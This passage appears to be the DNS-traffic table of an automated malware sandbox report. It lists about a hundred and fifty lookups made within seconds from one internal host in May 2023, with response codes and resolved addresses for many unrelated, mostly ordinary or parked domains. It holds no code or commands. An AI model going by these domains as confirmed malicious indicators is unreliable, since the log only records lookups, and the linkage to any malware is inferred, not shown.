                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.522528887 CEST8.8.8.8192.168.2.30xdd49No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.522528887 CEST8.8.8.8192.168.2.30xdd49No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.531148911 CEST8.8.8.8192.168.2.30x7d9bNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.577100039 CEST8.8.8.8192.168.2.30x65b4No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.581317902 CEST8.8.8.8192.168.2.30x3399Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.604180098 CEST8.8.8.8192.168.2.30xffabNo error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.609952927 CEST8.8.8.8192.168.2.30x82b9Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.656025887 CEST8.8.8.8192.168.2.30xc536No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.663242102 CEST8.8.8.8192.168.2.30xe4c4No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.674403906 CEST8.8.8.8192.168.2.30x432Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.717253923 CEST8.8.8.8192.168.2.30x4bb1Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.738720894 CEST8.8.8.8192.168.2.30xcc63No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.760601044 CEST8.8.8.8192.168.2.30xdb7eNo error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.760601044 CEST8.8.8.8192.168.2.30xdb7eNo error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.760601044 CEST8.8.8.8192.168.2.30xdb7eNo error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.765855074 CEST8.8.8.8192.168.2.30xee1aNo error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.801388025 CEST8.8.8.8192.168.2.30xd9e5No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.829787016 CEST8.8.8.8192.168.2.30xcb15Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.843660116 CEST8.8.8.8192.168.2.30x1de2No error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.875107050 CEST8.8.8.8192.168.2.30x2782No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.893290997 CEST8.8.8.8192.168.2.30xb352No error (0)assideum.com52.219.177.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.998696089 CEST8.8.8.8192.168.2.30x8a1dNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.998696089 CEST8.8.8.8192.168.2.30x8a1dNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.998696089 CEST8.8.8.8192.168.2.30x8a1dNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.998696089 CEST8.8.8.8192.168.2.30x8a1dNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.109584093 CEST8.8.8.8192.168.2.30xa444No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.129686117 CEST8.8.8.8192.168.2.30x1d02No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.129803896 CEST8.8.8.8192.168.2.30x6362No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.135113955 CEST8.8.8.8192.168.2.30x7cafNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.135113955 CEST8.8.8.8192.168.2.30x7cafNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.138755083 CEST8.8.8.8192.168.2.30xc9eeNo error (0)umcor.am188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.138755083 CEST8.8.8.8192.168.2.30xc9eeNo error (0)umcor.am188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.239295006 CEST8.8.8.8192.168.2.30xdf0cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.305849075 CEST8.8.8.8192.168.2.30x3cd5Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.309293032 CEST8.8.8.8192.168.2.30xaa2Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.334194899 CEST8.8.8.8192.168.2.30xfeddName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.383045912 CEST8.8.8.8192.168.2.30xb203Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.398567915 CEST8.8.8.8192.168.2.30xcb7fNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.441078901 CEST8.8.8.8192.168.2.30xe87cNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.621644974 CEST8.8.8.8192.168.2.30x9342No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.667895079 CEST8.8.8.8192.168.2.30x432Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.698503017 CEST8.8.8.8192.168.2.30xb357No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.704490900 CEST8.8.8.8192.168.2.30x1717Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.722160101 CEST8.8.8.8192.168.2.30x9e70Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.731992960 CEST8.8.8.8192.168.2.30x62a6No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.731992960 CEST8.8.8.8192.168.2.30x62a6No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.731992960 CEST8.8.8.8192.168.2.30x62a6No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.731992960 CEST8.8.8.8192.168.2.30x62a6No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.761266947 CEST8.8.8.8192.168.2.30x5852No error (0)amele.com85.159.66.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.789288044 CEST8.8.8.8192.168.2.30x4bc8No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.789333105 CEST8.8.8.8192.168.2.30x827dNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.789333105 CEST8.8.8.8192.168.2.30x827dNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.799578905 CEST8.8.8.8192.168.2.30xb63bNo error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.820233107 CEST8.8.8.8192.168.2.30x89f5No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.877129078 CEST8.8.8.8192.168.2.30x2f4No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.906917095 CEST8.8.8.8192.168.2.30xe0d4Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:09.979398966 CEST8.8.8.8192.168.2.30x6bfbServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.057988882 CEST8.8.8.8192.168.2.30x51a9Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.149454117 CEST8.8.8.8192.168.2.30x6d02No error (0)rkengg.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.149454117 CEST8.8.8.8192.168.2.30x6d02No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.149454117 CEST8.8.8.8192.168.2.30x6d02No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.149454117 CEST8.8.8.8192.168.2.30x6d02No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.173727036 CEST8.8.8.8192.168.2.30x8faNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.249788046 CEST8.8.8.8192.168.2.30xdf0cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.249867916 CEST8.8.8.8192.168.2.30x97feNo error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.310599089 CEST8.8.8.8192.168.2.30x46f5Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.312613010 CEST8.8.8.8192.168.2.30xc2bbNo error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.335391045 CEST8.8.8.8192.168.2.30x45bbNo error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.336791039 CEST8.8.8.8192.168.2.30xaa2Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.341362000 CEST8.8.8.8192.168.2.30xccd0No error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.424698114 CEST8.8.8.8192.168.2.30x5591No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.424698114 CEST8.8.8.8192.168.2.30x5591No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.450439930 CEST8.8.8.8192.168.2.30xb5b6No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.450439930 CEST8.8.8.8192.168.2.30xb5b6No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.450439930 CEST8.8.8.8192.168.2.30xb5b6No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.518086910 CEST8.8.8.8192.168.2.30xc1aeNo error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.565988064 CEST8.8.8.8192.168.2.30x4bbeNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.625746965 CEST8.8.8.8192.168.2.30x1ae0Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.649030924 CEST8.8.8.8192.168.2.30x3a9dName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.654933929 CEST8.8.8.8192.168.2.30xb40fServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.681874990 CEST8.8.8.8192.168.2.30x5401Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.695296049 CEST8.8.8.8192.168.2.30xc83eServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.712068081 CEST8.8.8.8192.168.2.30x8cc7No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.712068081 CEST8.8.8.8192.168.2.30x8cc7No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.712068081 CEST8.8.8.8192.168.2.30x8cc7No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.714235067 CEST8.8.8.8192.168.2.30x9e70Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.716053009 CEST8.8.8.8192.168.2.30x1717Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.717705011 CEST8.8.8.8192.168.2.30x46aNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.740248919 CEST8.8.8.8192.168.2.30xc3cfNo error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.745531082 CEST8.8.8.8192.168.2.30xaf1No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.761976957 CEST8.8.8.8192.168.2.30x790fNo error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.761976957 CEST8.8.8.8192.168.2.30x790fNo error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.770128965 CEST8.8.8.8192.168.2.30x9953No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.770128965 CEST8.8.8.8192.168.2.30x9953No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.770128965 CEST8.8.8.8192.168.2.30x9953No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.770128965 CEST8.8.8.8192.168.2.30x9953No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.894344091 CEST8.8.8.8192.168.2.30xbefeNo error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.986633062 CEST8.8.8.8192.168.2.30x298eNo error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:10.993448973 CEST8.8.8.8192.168.2.30xaffdNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.085728884 CEST8.8.8.8192.168.2.30x9e82No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.149791956 CEST8.8.8.8192.168.2.30x7d3aNo error (0)araax.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.149791956 CEST8.8.8.8192.168.2.30x7d3aNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.149791956 CEST8.8.8.8192.168.2.30x7d3aNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.149791956 CEST8.8.8.8192.168.2.30x7d3aNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.248794079 CEST8.8.8.8192.168.2.30xaa43No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.248794079 CEST8.8.8.8192.168.2.30xaa43No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.295409918 CEST8.8.8.8192.168.2.30xdf0cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.406177044 CEST8.8.8.8192.168.2.30x925fNo error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.410428047 CEST8.8.8.8192.168.2.30x9d23No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.530184031 CEST8.8.8.8192.168.2.30xa1e5No error (0)iranytu.net103.224.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.612194061 CEST8.8.8.8192.168.2.30xf66eNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.659009933 CEST8.8.8.8192.168.2.30x8339No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.687712908 CEST8.8.8.8192.168.2.30x4749Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.693183899 CEST8.8.8.8192.168.2.30x988fNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.724179983 CEST8.8.8.8192.168.2.30xfd93No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.724179983 CEST8.8.8.8192.168.2.30xfd93No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.726974964 CEST8.8.8.8192.168.2.30x1717Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.744673014 CEST8.8.8.8192.168.2.30x9e70Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.823539019 CEST8.8.8.8192.168.2.30x4d43No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.856508017 CEST8.8.8.8192.168.2.30x5b3aNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.870618105 CEST8.8.8.8192.168.2.30x88dName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.881757021 CEST8.8.8.8192.168.2.30x746bNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.906353951 CEST8.8.8.8192.168.2.30x25eeName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:11.944490910 CEST8.8.8.8192.168.2.30xadeName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.200901031 CEST8.8.8.8192.168.2.30x7cccNo error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.200901031 CEST8.8.8.8192.168.2.30x7cccNo error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.244723082 CEST8.8.8.8192.168.2.30x58d9No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.328326941 CEST8.8.8.8192.168.2.30x9f18No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.341747999 CEST8.8.8.8192.168.2.30xaa2Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.467652082 CEST8.8.8.8192.168.2.30xac1eNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.467652082 CEST8.8.8.8192.168.2.30xac1eNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.614483118 CEST8.8.8.8192.168.2.30x1856Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.700118065 CEST8.8.8.8192.168.2.30x5be2No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.700118065 CEST8.8.8.8192.168.2.30x5be2No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.710731030 CEST8.8.8.8192.168.2.30x4749Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.935281038 CEST8.8.8.8192.168.2.30xdf59No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.976398945 CEST8.8.8.8192.168.2.30xad24No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.978065014 CEST8.8.8.8192.168.2.30xb650No error (0)amele.com85.159.66.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:12.988698006 CEST8.8.8.8192.168.2.30xe384No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.031575918 CEST8.8.8.8192.168.2.30xf3a1No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.037117958 CEST8.8.8.8192.168.2.30xcbcfServer failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.123744965 CEST8.8.8.8192.168.2.30xb87eNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.127372980 CEST8.8.8.8192.168.2.30x2acdNo error (0)vivastay.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.127372980 CEST8.8.8.8192.168.2.30x2acdNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.127372980 CEST8.8.8.8192.168.2.30x2acdNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.127372980 CEST8.8.8.8192.168.2.30x2acdNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.164732933 CEST8.8.8.8192.168.2.30x17e6No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.274703026 CEST8.8.8.8192.168.2.30x759No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.342145920 CEST8.8.8.8192.168.2.30xdf0cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.394318104 CEST8.8.8.8192.168.2.30xb5b2No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.394318104 CEST8.8.8.8192.168.2.30xb5b2No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.394318104 CEST8.8.8.8192.168.2.30xb5b2No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.488559008 CEST8.8.8.8192.168.2.30x9f36No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.568931103 CEST8.8.8.8192.168.2.30xb67fNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.622191906 CEST8.8.8.8192.168.2.30x1856Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.632136106 CEST8.8.8.8192.168.2.30xe07fNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.661428928 CEST8.8.8.8192.168.2.30x5c48No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.732023954 CEST8.8.8.8192.168.2.30x4749Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.753676891 CEST8.8.8.8192.168.2.30x7b0No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.816373110 CEST8.8.8.8192.168.2.30xc181No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
